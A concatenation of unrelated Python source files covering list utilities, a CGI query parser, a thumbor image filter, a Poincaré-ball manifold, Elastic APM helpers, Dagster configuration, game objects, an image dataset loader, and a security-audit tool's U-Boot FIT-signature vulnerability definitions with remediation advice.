if not f_ed: raise ListError("Not_found")
else: return f_ed[0]
# ~ List.assoc in OCaml
# return the value associated with the given key
# e.g., assoc(a, [..., (a, b), ...]) == b
@takes(anything, list_of(tuple_of(anything)))
@returns(anything)
def assoc(a, lst):
for x, y in lst:
if a == x: return y
raise ListError("Not_found")
# ~ List.partition in OCaml
# divide the given list into two lists:
# one satisfying the condition and the other not satisfying the condition
# e.g., \x . x > 0, [1, -2, -3, 4] -> [1, 4], [-2, -3]
@takes(callable, list)
@returns(tuple_of(list))
def partition(pred, lst):
return list(ifilter(pred, lst)), list(ifilterfalse(pred, lst))
# ~ List.split in OCaml
# transform a list of pairs into a pair of lists
# e.g., [ (1, 'a'), (2, 'b'), (3, 'c') ] -> ([1, 2, 3], ['a', 'b', 'c'])
@takes(list_of(tuple_of(anything)))
@returns(tuple_of(list_of(anything)))
def split(lst):
if not lst: return ([], [])
else:
a, b = zip(*lst) # zip doesn't handle an empty list
return (list(a), list(b))
# ~ List.flatten in OCaml
# e.g., [ [1], [2, 3], [4] ] -> [1, 2, 3, 4]
@takes(list_of(list_of(anything)))
@returns(list_of(anything))
def flatten(lstlst):
return list(chain.from_iterable(lstlst))
# flatten class declarations or hierarchy
# "inners": class A { class Inner { class InnerMost }} -> [A, Inner, InnerMost]
# "subs": ActA, ActB, ... < Act < Cxt -> [Cxt, Act, ActA, ActB, ...]
@takes(list_of("Clazz"), str)
@returns(list_of("Clazz"))
def flatten_classes(clss, attr):
mapped = map(op.attrgetter(attr), clss)
if not mapped: return clss
else:
flattened = flatten(mapped)
diff = list(set(flattened) - set(clss))
if not diff: return clss
else: return flatten_classes(clss + diff, attr)
"""
More utilities
"""
# intersection: common elements in both lists
# e.g., [a, b, c] & [a, b, d] -> [a, b]
@takes(list_of(anything), list_of(anything))
@returns(list_of(anything))
def intersection(lst1, lst2):
return list(set(lst1) & set(lst2))
# remove duplicates in the given list
# e.g., [1, 2, 2] -> [1, 2]
@takes(list_of(anything))
@returns(list_of(anything))
def rm_dup(lst):
return list(set(lst))
# remove None in the given list
# e.g., [1, 2, None, 3] -> [1, 2, 3]
@takes(list_of(anything))
@returns(list_of(anything))
def rm_none(lst):
return filter(partial(op.is_not, None), lst)
# remove anything that is evaluated to False, such as None or empty string
# e.g., [1, 2, None, 3] -> [1, 2, 3]
# ["a", "", "z"] => ["a", "z"]
@takes(list_of(anything))
@returns(list_of(anything))
def ffilter(lst):
return filter(None, lst)
# make a new entry of list type or append the given item
# e.g., {x: [1]}, x, 2 => {x: [1,2]}
# {x: [1]}, y, 2 => {x: [1], y: [2]}
@takes(dict_of(anything, list_of(anything)), anything, anything, optional(bool))
@returns(nothing)
def mk_or_append(dic, k, v, uniq=True):
if k in dic: # already bound key
if not uniq or v not in dic[k]: # uniq => value v not recorded
dic[k].append(v)
    else: # new occurrence of key k
dic[k] = [v]
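# merge a list of dicts of list type, deduplicating each value list
# e.g., [ {x: [1]}, {x: [2], y: [3]} ] -> {x: [1, 2], y: [3]} (value order not guaranteed)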
@takes(list_of(dict_of(anything, list_of(anything))))
@returns(dict_of(anything, list_of(anything)))
def merge_dict(lst):
def reducer(acc, dic):
keys = set(acc.keys() + dic.keys())
return dict((k, rm_dup(acc.get(k, []) + dic.get(k, []))) for k in keys)
return reduce(reducer, lst, {})
@takes(nothing)
@returns(str)
def get_datetime():
return datetime.datetime.now().strftime("%y%m%d_%H%M%S")
"""
Yale Sparse Matrix Format
http://www.cs.yale.edu/publications/techreports/tr112.pdf
"""
@takes(list_of(list_of(int)))
@returns(tuple_of(list_of(int)))
def yale_format(mat):
if not mat: return [], [], []
# assume rows are of the same size
m, n = len(mat), len(mat[0])
A = []
IA = []
JA = []
ja_idx = 0
IA.append(ja_idx)
for i in xrange(0, m):
for j in xrange(0, n):
itm = mat[i][j]
if itm:
A.append(itm)
JA.append(j)
ja_idx = ja_idx + 1
IA.append(ja_idx)
return A, IA, JA
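# e.g., yale_format([[1, 0, 2], [0, 3, 0]]) -> ([1, 2, 3], [0, 2, 3], [0, 2, 1])
#   A : the non-zero values in row-major order
#   IA: IA[i+1] - IA[i] is the number of non-zeros in row i
#   JA: the column index of each corresponding value in A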
|
#!/usr/bin/env python
import os
from query_string import query_string
__all__ = ["GET"]
def _get():
kwargs = dict()
if "QUERY_STRING" in os.environ:
QUERY_STRING = os.environ["QUERY_STRING"]
qs = query_string(QUERY_STRING)
for k in qs:
v = qs[k]
kwargs[k] = v
return kwargs
GET = _get()
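# e.g., with QUERY_STRING="a=1&b=2" in the environment, GET == {"a": "1", "b": "2"}
# (assuming `query_string` parses the raw string into a {key: value} dict)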
|
""" Contains WikiPage type """
from __future__ import annotations
# noinspection PyPep8Naming
from mwclient import Site as API
from utils.ScorableItem import ScorableItem
# noinspection PyPep8Naming
TITLE_SAFE_CHARACTERS = "/ "
SPACE_REPLACEMENT = "_"
# noinspection PyShadowingBuiltins
# pylint: disable=too-few-public-methods,redefined-builtin
class WikiPage(ScorableItem):
""" Holds data used to identify wiki pages """
wiki: API
id: int
title: str
display_title: str
namespace: str
url: str
_score: int = 0
# pylint: disable=too-many-arguments
def __init__(self, wiki: API, id: int, title: str,
display_title: str, namespace: str, url: str) -> None:
super().__init__()
self.wiki = wiki
self.id = id
self.title = title
self.display_title = display_title
self.namespace = namespace
self.url = url
def _get_score_fields(self) -> list[str]:
return [self.title]
|
# SPDX-License-Identifier: BSD-3-Clause
# Depthcharge: <https://github.com/nccgroup/depthcharge>
"""
Built-in SecurityRisk definitions associated with FIT image functionality
"""
from textwrap import dedent
from .. import SecurityImpact
def _enabled_with_legacy_image(value: str, config: dict):
return value and config.get('CONFIG_LEGACY_IMAGE_FORMAT', False)
_BUILTIN_DEFS = (
('CONFIG_FIT_SIGNATURE', True, {
'identifier': 'CVE-2018-3968',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'summary':
'Unsigned "legacy" images can be still executed when FIT image signature validation is enabled',
'description': dedent("""\
Prior to U-Boot 2014.07-rc3 there was no build-time configuration option for disabling
support for unsigned "legacy" images. As a result, enabling FIT image signature
validation via `CONFIG_FIT_SIGNATURE=y` was not sufficient to ensure that only
images passing signature validation could be booted.
Given the ability to stage an unsigned "legacy" image and pass it to `bootm`, an
attacker can bypass signature validation and execute arbitrary code.
Refer to the following advisory for more information:
<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0633>
"""),
'recommendation': dedent("""\
Update to U-Boot 2014.07 or otherwise backport the changes from commit 21d29f7f.
Ensure `CONFIG_LEGACY_IMAGE_FORMAT` is disabled when using `CONFIG_FIT_SIGNATURE=y`.
"""),
'affected_versions': ('2013.07-rc1', '2014.07-rc2')
}),
('CONFIG_FIT_SIGNATURE', True, {
'identifier': 'CVE-2018-1000205',
'summary': 'Edge cases in FIT and FDT code could result in a verified boot bypass',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'description': dedent("""\
            The following mailing list post proposed three patches addressing unaccounted-for edge cases
believed to present a risk of verified boot bypasses. The author notes that the threat
scenario requires special hardware behavior. Determining the susceptibility of any given
platform would require more review, as information in the CVE entry is sparse.
Link:
<https://lists.denx.de/pipermail/u-boot/2018-June/330898.html>
"""),
# Before commenting on backporting patches, need to investigate the item noted below.
# The author's vboot patches landed in 7346c1e1 and 72239fc8.
#
# TODO: Track down the FDT change WRT https://lists.denx.de/pipermail/u-boot/2018-June/330601.html
#
'recommendation': 'Update to U-Boot 2018.09.\n',
'affected_versions': ('0.0', '2018.09')
}),
# Vestigial reference design configuration that results in behavior similar to CVE-2018-3968
('CONFIG_FIT_SIGNATURE', _enabled_with_legacy_image, {
'identifier': 'BOTH_LEGACY_AND_FIT_SIG_ENABLED',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'summary':
'Unsigned "legacy" images can be still executed when FIT image signature validation is enabled',
'description': dedent("""\
In order for U-Boot's FIT signature enforcement to be effective, support for the unsigned
"legacy" image format must be disabled. Otherwise, an attacker can bypass signature validation
by providing and booting a legacy image.
In U-Boot 2014.07 and later, enabling `CONFIG_FIT_SIGNATURE=y` implies that
`CONFIG_LEGACY_IMAGE_FORMAT` should be disabled by default. However, if `CONFIG_LEGACY_IMAGE_FORMAT`
is explicitly enabled in the platform configuration (as is the case in many reference
            design configurations), legacy image support will still be included. This results in the
configuration described above, which may undermine the intended image authenticity
enforcement goals.
"""),
'recommendation': dedent("""\
Disable the legacy image format via `CONFIG_LEGACY_IMAGE_FORMAT` in situations where a
platform shall only boot signed, verified images.
"""),
}),
# Fixes for this appeared to land in the merge commit @ e0718b3ab754860bd47677e6b4fc5b70da42c4ab,
# with fixes in 390b26dc270aa3159df0c31775f91cd374a3dd3a..0e29648f8e7e0aa60c0f7efe9d2efed98f8c0c6e
('CONFIG_FIT_SIGNATURE', True, {
'identifier': 'CVE-2020-10648',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'summary':
'FIT image signature validation can be bypassed by tampering with an authentic image',
'description': dedent("""\
Prior to version 2020.04(-rc5), U-Boot did not verify that the contents of a FIT
image configuration's *hashed-nodes* was actually associated with the images used when
booting a specific configuration.
As a result, an attacker could append additional configurations that included their own
images to execute, but specify that the signatures be computed over legitimate images
contained in a different, authentic configuration.
In situations where an attacker can tamper with a FIT image, stage their own payloads,
and control which configuration is booted, this can allow signature validation to be
bypassed and arbitrary attacker-provided code to be executed.
Refer to the following advisory for additional information:
<https://labs.f-secure.com/advisories/das-u-boot-verified-boot-bypass>
"""),
'recommendation': dedent("""\'
Update to U-Boot 2020.04, or otherwise backport fixes merged in commit e0718b3a.
Per the F-Secure advisory, one possible mitigation is to explicitly specify the
configuration in the FIT image to boot: `bootm ${loadaddr}#conf@1 - ${fdtaddr}`
This mitigation, of course, assumes that an attacker is not able to otherwise tamper
with the bootloader environment (e.g. `bootcmd`).
Links:
<https://gitlab.denx.de/u-boot/u-boot/-/commit/e0718b3ab754860bd47677e6b4fc5b70da42c4ab>
<https://lists.denx.de/pipermail/u-boot/2020-March/403409.html>
<https://labs.f-secure.com/advisories/das-u-boot-verified-boot-bypass>
"""),
# FIXME: Advisory is a bit iffy on the 2018.03 minimum version, so we just use 0's here.
# Need to revisit this when I have time to spend on git archaeology in order to determine
# the first relevant version. Presumably there exists a version where the affected FIT
# signature or configuration functionally isn't even present, and this will be our minimum.
'affected_versions': ('0.0', '2020.04-rc5'),
})
)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com thumbor@googlegroups.com
from thumbor.ext.filters import _nine_patch
from thumbor.filters import BaseFilter, filter_method
from thumbor.loaders import LoaderResult
class Filter(BaseFilter):
regex = r"(?:frame\((?P<url>.*?))"
async def on_image_ready(self, buffer):
self.nine_patch_engine.load(buffer, None)
self.nine_patch_engine.enable_alpha()
self.engine.enable_alpha()
(
nine_patch_mode,
nine_patch_data,
) = self.nine_patch_engine.image_data_as_rgb()
padding = _nine_patch.get_padding(
nine_patch_mode,
nine_patch_data,
self.nine_patch_engine.size[0],
self.nine_patch_engine.size[1],
)
self.handle_padding(padding)
mode, data = self.engine.image_data_as_rgb()
if mode != nine_patch_mode:
raise RuntimeError(
f"Image mode mismatch: {mode} != {nine_patch_mode}"
)
imgdata = _nine_patch.apply(
mode,
data,
self.engine.size[0],
self.engine.size[1],
nine_patch_data,
self.nine_patch_engine.size[0],
self.nine_patch_engine.size[1],
)
self.engine.set_image_data(imgdata)
def handle_padding(self, padding):
"""Pads the image with transparent pixels if necessary."""
left = padding[0]
top = padding[1]
right = padding[2]
bottom = padding[3]
offset_x = 0
offset_y = 0
new_width = self.engine.size[0]
new_height = self.engine.size[1]
if left > 0:
offset_x = left
new_width += left
if top > 0:
offset_y = top
new_height += top
if right > 0:
new_width += right
if bottom > 0:
new_height += bottom
new_engine = self.context.modules.engine.__class__(self.context)
new_engine.image = new_engine.gen_image(
(new_width, new_height), "#fff"
)
new_engine.enable_alpha()
new_engine.paste(self.engine, (offset_x, offset_y))
self.engine.image = new_engine.image
async def on_fetch_done(self, result):
# TODO if result.successful is False how can the error be handled?
if isinstance(result, LoaderResult):
buffer = result.buffer
else:
buffer = result
self.nine_patch_engine.load(buffer, None)
await self.storage.put(self.url, self.nine_patch_engine.read())
await self.storage.put_crypto(self.url)
await self.on_image_ready(buffer)
@filter_method(BaseFilter.String)
async def frame(self, url):
self.url = url
self.nine_patch_engine = self.context.modules.engine.__class__(
self.context
)
self.storage = self.context.modules.storage
buffer = await self.storage.get(self.url)
if buffer is not None:
return await self.on_image_ready(buffer)
result = await self.context.modules.loader.load(self.context, self.url)
await self.on_fetch_done(result)
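# Usage sketch (hypothetical URL): requesting
#   .../filters:frame(http://example.com/borders/shadow.9.png)/...
# fetches the nine-patch image, pads the target image according to the patch's
# padding metadata, and composites the frame on top of the result.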
|
import torch
from .manifold import Manifold
from frechetmean.utils import EPS, cosh, sinh, tanh, arcosh, arsinh, artanh, sinhdiv, divsinh
class Poincare(Manifold):
def __init__(self, K=-1.0, edge_eps=1e-3):
super(Poincare, self).__init__()
        self.edge_eps = edge_eps
assert K < 0
if torch.is_tensor(K):
self.K = K
else:
self.K = torch.tensor(K)
def sh_to_dim(self, sh):
if hasattr(sh, '__iter__'):
return sh[-1]
else:
return sh
def dim_to_sh(self, dim):
if hasattr(dim, '__iter__'):
return dim[-1]
else:
return dim
def zero(self, *shape):
return torch.zeros(*shape)
def zero_tan(self, *shape):
return torch.zeros(*shape)
def zero_like(self, x):
return torch.zeros_like(x)
def zero_tan_like(self, x):
return torch.zeros_like(x)
def lambda_x(self, x, keepdim=False):
return 2 / (1 + self.K * x.pow(2).sum(dim=-1, keepdim=keepdim)).clamp_min(min=EPS[x.dtype])
def inner(self, x, u, v, keepdim=False):
return self.lambda_x(x, keepdim=True).pow(2) * (u * v).sum(dim=-1, keepdim=keepdim)
def proju(self, x, u):
return u
def projx(self, x):
norm = x.norm(dim=-1, keepdim=True).clamp(min=EPS[x.dtype])
maxnorm = (1 - self.edge_eps) / (-self.K).sqrt()
cond = norm > maxnorm
projected = x / norm * maxnorm
return torch.where(cond, projected, x)
def egrad2rgrad(self, x, u):
return u / self.lambda_x(x, keepdim=True).pow(2)
def mobius_addition(self, x, y):
x2 = x.pow(2).sum(dim=-1, keepdim=True)
y2 = y.pow(2).sum(dim=-1, keepdim=True)
xy = (x * y).sum(dim=-1, keepdim=True)
num = (1 - 2 * self.K * xy - self.K * y2) * x + (1 + self.K * x2) * y
denom = 1 - 2 * self.K * xy + (self.K.pow(2)) * x2 * y2
return num / denom.clamp_min(EPS[x.dtype])
def exp(self, x, u):
u_norm = u.norm(dim=-1, keepdim=True).clamp_min(min=EPS[x.dtype])
second_term = (
tanh((-self.K).sqrt() / 2 * self.lambda_x(x, keepdim=True) * u_norm) * u / ((-self.K).sqrt() * u_norm)
)
gamma_1 = self.mobius_addition(x, second_term)
return gamma_1
def log(self, x, y):
sub = self.mobius_addition(-x, y)
sub_norm = sub.norm(dim=-1, keepdim=True).clamp_min(EPS[x.dtype])
lam = self.lambda_x(x, keepdim=True)
return 2 / ((-self.K).sqrt() * lam) * artanh((-self.K).sqrt() * sub_norm) * sub / sub_norm
def dist(self, x, y, squared=False, keepdim=False):
dist = 2 * artanh((-self.K).sqrt() * self.mobius_addition(-x, y).norm(dim=-1)) / (-self.K).sqrt()
return dist.pow(2) if squared else dist
def _gyration(self, u, v, w):
u2 = u.pow(2).sum(dim=-1, keepdim=True)
v2 = v.pow(2).sum(dim=-1, keepdim=True)
uv = (u * v).sum(dim=-1, keepdim=True)
uw = (u * w).sum(dim=-1, keepdim=True)
vw = (v * w).sum(dim=-1, keepdim=True)
a = - self.K.pow(2) * uw * v2 - self.K * vw + 2 * self.K.pow(2) * uv * vw
b = - self.K.pow(2) * vw * u2 + self.K * uw
d = 1 - 2 * self.K * uv + self.K.pow(2) * u2 * v2
return w + 2 * (a * u + b * v) / d.clamp_min(EPS[u.dtype])
def transp(self, x, y, u):
return (
self._gyration(y, -x, u)
* self.lambda_x(x, keepdim=True)
/ self.lambda_x(y, keepdim=True)
)
def __str__(self):
return 'Poincare Ball'
def squeeze_tangent(self, x):
return x
def unsqueeze_tangent(self, x):
return x
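# Sanity-check sketch (assumes the Poincare class above; exp and log should invert each other):
#
#   p = Poincare(K=-1.0)
#   x = p.projx(0.1 * torch.randn(5, 3))  # points inside the ball
#   u = 0.1 * torch.randn(5, 3)           # small tangent vectors at x
#   y = p.exp(x, u)
#   assert torch.allclose(p.exp(x, p.log(x, y)), y, atol=1e-5)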
|
# BSD 3-Clause License
#
# Copyright (c) 2012, the Sentry Team, see AUTHORS for more details
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import base64
import os
import re
from functools import partial
from elasticapm.conf import constants
from elasticapm.utils import compat, encoding
try:
from functools import partialmethod
partial_types = (partial, partialmethod)
except ImportError:
# Python 2
partial_types = (partial,)
default_ports = {"https": 443, "http": 80, "postgresql": 5432}
def varmap(func, var, context=None, name=None):
"""
Executes ``func(key_name, value)`` on all values,
recursively discovering dict and list scoped
values.
"""
if context is None:
context = set()
objid = id(var)
if objid in context:
return func(name, "<...>")
context.add(objid)
if isinstance(var, dict):
ret = dict((k, varmap(func, v, context, k)) for k, v in compat.iteritems(var))
elif isinstance(var, (list, tuple)):
ret = func(name, [varmap(func, f, context, name) for f in var])
else:
ret = func(name, var)
context.remove(objid)
return ret
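# Example (sketch): doubling every int while leaving keys and containers intact:
#   varmap(lambda k, v: v * 2 if isinstance(v, int) else v, {"a": 1, "b": [2]})
#   -> {"a": 2, "b": [4]}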
def get_name_from_func(func):
# partials don't have `__module__` or `__name__`, so we use the values from the "inner" function
if isinstance(func, partial_types):
return "partial({})".format(get_name_from_func(func.func))
elif hasattr(func, "_partialmethod") and hasattr(func._partialmethod, "func"):
return "partial({})".format(get_name_from_func(func._partialmethod.func))
module = func.__module__
if hasattr(func, "__name__"):
view_name = func.__name__
else: # Fall back if there's no __name__
view_name = func.__class__.__name__
return "{0}.{1}".format(module, view_name)
def build_name_with_http_method_prefix(name, request):
return " ".join((request.method, name)) if name else name
def is_master_process():
# currently only recognizes uwsgi master process
try:
import uwsgi
return os.getpid() == uwsgi.masterpid()
except ImportError:
return False
def get_url_dict(url):
scheme, netloc, path, params, query, fragment = compat.urlparse.urlparse(url)
if ":" in netloc:
hostname, port = netloc.split(":")
else:
hostname, port = (netloc, None)
url_dict = {
"full": encoding.keyword_field(url),
"protocol": scheme + ":",
"hostname": encoding.keyword_field(hostname),
"pathname": encoding.keyword_field(path),
}
if port:
url_dict["port"] = port
if query:
url_dict["search"] = encoding.keyword_field("?" + query)
return url_dict
def sanitize_url(url):
if "@" not in url:
return url
parts = compat.urlparse.urlparse(url)
return url.replace("%s:%s" % (parts.username, parts.password), "%s:%s" % (parts.username, constants.MASK))
def read_pem_file(file_obj):
cert = b""
for line in file_obj:
if line.startswith(b"-----BEGIN CERTIFICATE-----"):
break
for line in file_obj:
if not line.startswith(b"-----END CERTIFICATE-----"):
cert += line.strip()
return base64.b64decode(cert)
def starmatch_to_regex(pattern):
i, n = 0, len(pattern)
res = []
while i < n:
c = pattern[i]
i = i + 1
if c == "*":
res.append(".*")
else:
res.append(re.escape(c))
return re.compile(r"(?:%s)\Z" % "".join(res), re.IGNORECASE | re.DOTALL)
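# Example (sketch):
#   pattern = starmatch_to_regex("*.example.com")
#   assert pattern.match("api.example.com")
#   assert not pattern.match("example.org")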
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from chardistribution import EUCTWDistributionAnalysis
from codingstatemachine import CodingStateMachine
from mbcharsetprober import MultiByteCharSetProber
from mbcssm import EUCTWSMModel
class EUCTWProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(EUCTWSMModel)
self._mDistributionAnalyzer = EUCTWDistributionAnalysis()
self.reset()
def get_charset_name(self):
return "EUC-TW"
|
from dagster_celery.executor import CELERY_CONFIG
from dagster_k8s import DagsterK8sJobConfig
from dagster import Field, Noneable, StringSource
from dagster.core.host_representation.handle import IN_PROCESS_NAME
from dagster.utils import merge_dicts
CELERY_K8S_CONFIG_KEY = "celery-k8s"
def celery_k8s_config():
# DagsterK8sJobConfig provides config schema for specifying Dagster K8s Jobs
job_config = DagsterK8sJobConfig.config_type_pipeline_run()
additional_config = {
"load_incluster_config": Field(
bool,
is_required=False,
default_value=True,
description="""Set this value if you are running the launcher within a k8s cluster. If
``True``, we assume the launcher is running within the target cluster and load config
using ``kubernetes.config.load_incluster_config``. Otherwise, we will use the k8s config
specified in ``kubeconfig_file`` (using ``kubernetes.config.load_kube_config``) or fall
back to the default kubeconfig. Default: ``True``.""",
),
"kubeconfig_file": Field(
Noneable(str),
is_required=False,
description="Path to a kubeconfig file to use, if not using default kubeconfig.",
),
"job_namespace": Field(
StringSource,
is_required=False,
default_value="default",
description="The namespace into which to launch new jobs. Note that any "
"other Kubernetes resources the Job requires (such as the service account) must be "
'present in this namespace. Default: ``"default"``',
),
"repo_location_name": Field(
StringSource,
is_required=False,
default_value=IN_PROCESS_NAME,
description="The repository location name to use for execution.",
),
}
cfg = merge_dicts(CELERY_CONFIG, job_config)
cfg = merge_dicts(cfg, additional_config)
return cfg
def get_celery_engine_config():
return {
"execution": {
CELERY_K8S_CONFIG_KEY: {
"config": {
"job_image": {"env": "DAGSTER_K8S_PIPELINE_RUN_IMAGE"},
"job_namespace": {"env": "DAGSTER_K8S_PIPELINE_RUN_NAMESPACE"},
"image_pull_policy": {"env": "DAGSTER_K8S_PIPELINE_RUN_IMAGE_PULL_POLICY"},
"env_config_maps": [{"env": "DAGSTER_K8S_PIPELINE_RUN_ENV_CONFIGMAP"}],
}
}
}
}
def get_celery_engine_grpc_config():
return {
"execution": {
CELERY_K8S_CONFIG_KEY: {
"config": {
"job_namespace": {"env": "DAGSTER_K8S_PIPELINE_RUN_NAMESPACE"},
"image_pull_policy": {"env": "DAGSTER_K8S_PIPELINE_RUN_IMAGE_PULL_POLICY"},
"env_config_maps": [{"env": "DAGSTER_K8S_PIPELINE_RUN_ENV_CONFIGMAP"}],
}
}
}
}
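# Usage sketch: the returned dict supplies the "execution" section of a pipeline run config;
# each {"env": ...} entry is resolved from the named environment variable when the run launches.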
|
from common import *
|
import numpy as np
from . import constants
class Object:
def __init__(self, world, pos):
self.world = world
self.pos = np.array(pos)
self.random = world.random
self.health = 0
@property
def texture(self):
        raise NotImplementedError('unknown texture')
@property
def walkable(self):
return constants.walkable
def move(self, direction):
direction = np.array(direction)
target = self.pos + direction
if self.is_free(target):
self.world.move(self, target)
return True
return False
def is_free(self, target, materials=None):
materials = self.walkable if materials is None else materials
material, obj = self.world[target]
return obj is None and material in materials
def distance(self, target):
if hasattr(target, 'pos'):
target = target.pos
return np.abs(target - self.pos).sum()
def toward(self, target, long_axis=True):
if hasattr(target, 'pos'):
target = target.pos
offset = target - self.pos
dists = np.abs(offset)
if (dists[0] > dists[1] if long_axis else dists[0] <= dists[1]):
return np.array((np.sign(offset[0]), 0))
else:
return np.array((0, np.sign(offset[1])))
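    # toward() example: offset (3, -1): long_axis=True -> (1, 0); long_axis=False -> (0, -1)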
def random_dir(self):
dirs = ((-1, 0), (+1, 0), (0, -1), (0, +1))
return dirs[self.random.randint(0, len(dirs))]
class Player(Object):
def __init__(self, world, pos):
super().__init__(world, pos)
self.facing = (0, 1)
@property
def texture(self):
if self.world[self.pos][0] == 'water':
return 'player-water'
else:
return 'player'
# return {
# (-1, 0): 'player-left',
# (+1, 0): 'player-right',
# (0, -1): 'player-up',
# (0, +1): 'player-down',
# }[tuple(self.facing)]
@property
def walkable(self):
return constants.walkable
def update(self, action):
target = (self.pos[0] + self.facing[0], self.pos[1] + self.facing[1])
material, obj = self.world[target]
# When in water move randomly, with current moving left.
if self.world[self.pos][0] == 'water':
action = self.random.choice(
[0, 1, 2, 3, 4], p=[0.2, 0.25, 0.15, 0.2, 0.2])
action = constants.actions[action]
if action == 'noop':
pass
elif action.startswith('move_'):
self._move(action[len('move_'):])
def _move(self, direction):
dirs = dict(left=(-1, 0), right=(+1, 0), up=(0, -1), down=(0, +1))
self.facing = dirs[direction]
self.move(self.facing)
|
import torch.utils.data as data
from PIL import Image
import os
import os.path
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
print('the data loader file has been modified')
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm']
def is_image_file(filename):
"""Checks if a file is an image.
Args:
filename (string): path to a file
Returns:
bool: True if the filename ends with a known image extension
"""
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in IMG_EXTENSIONS)
def find_classes(dir):
classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def make_dataset(dir, class_to_idx):
images = []
dir = os.path.expanduser(dir)
for target in sorted(os.listdir(dir)):
d = os.path.join(dir, target)
if not os.path.isdir(d):
continue
for root, _, fnames in sorted(os.walk(d)):
for fname in sorted(fnames):
if is_image_file(fname):
path = os.path.join(root, fname)
item = (path, class_to_idx[target])
images.append(item)
return images
def pil_loader(path):
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def accimage_loader(path):
import accimage
try:
return accimage.Image(path)
except IOError:
# Potentially a decoding problem, fall back to PIL.Image
return pil_loader(path)
def default_loader(path):
from torchvision import get_image_backend
if get_image_backend() == 'accimage':
return accimage_loader(path)
else:
return pil_loader(path)
class ImageFolder_new(data.Dataset):
"""A generic data loader where the images are arranged in this way: ::
root/dog/xxx.png
root/dog/xxy.png
root/dog/xxz.png
root/cat/123.png
root/cat/nsdf3.png
root/cat/asd932_.png
Args:
root (string): Root directory path.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
loader (callable, optional): A function to load an image given its path.
Attributes:
classes (list): List of the class names.
class_to_idx (dict): Dict with items (class_name, class_index).
imgs (list): List of (image path, class_index) tuples
"""
def __init__(self, root, transform=None, target_transform=None,
loader=default_loader):
classes, class_to_idx = find_classes(root)
imgs = make_dataset(root, class_to_idx)
if len(imgs) == 0:
            raise RuntimeError("Found 0 images in subfolders of: " + root + "\n"
                               "Supported image extensions are: " + ",".join(IMG_EXTENSIONS))
self.root = root
self.imgs = imgs
self.classes = classes
self.class_to_idx = class_to_idx
self.transform = transform
self.target_transform = target_transform
self.loader = loader
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.imgs[index]
img = self.loader(path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.imgs)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
